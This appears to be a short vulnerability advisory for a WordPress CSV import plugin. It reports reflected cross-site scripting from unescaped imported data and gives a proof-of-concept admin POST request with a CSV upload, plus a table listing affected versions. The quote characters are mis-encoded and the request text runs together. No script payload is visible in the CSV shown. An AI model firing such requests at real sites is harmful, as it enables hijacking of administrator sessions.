The plugin does not sanitise and escape the imported data before outputting it back in the page, leading to a Reflected Cross-Site Scripting
POST /wp-admin/admin.php?page=simple-woocommerce-csv-loader%2Fadmin%2FCSVLoader.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookies: [logged in admin] Connection: close ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name=βpost_typeβ product ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name=βseparatorβ , ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name=βtiteledβ on ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name=βhierarchical_multicatβ on ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name=βupload_fileβ; filename=βexample_code.csvβ Content-Type: text/csv Name,Content,Price,Gender,sku,Multi_cat,Thumbnail Strawberry Short Cake,Delicious Strawberry Cake 18"",80,Bakery,001,Dessert,
CPE | Name | Operator | Version |
---|---|---|---|
simple-woocommerce-csv-loader | eq | * |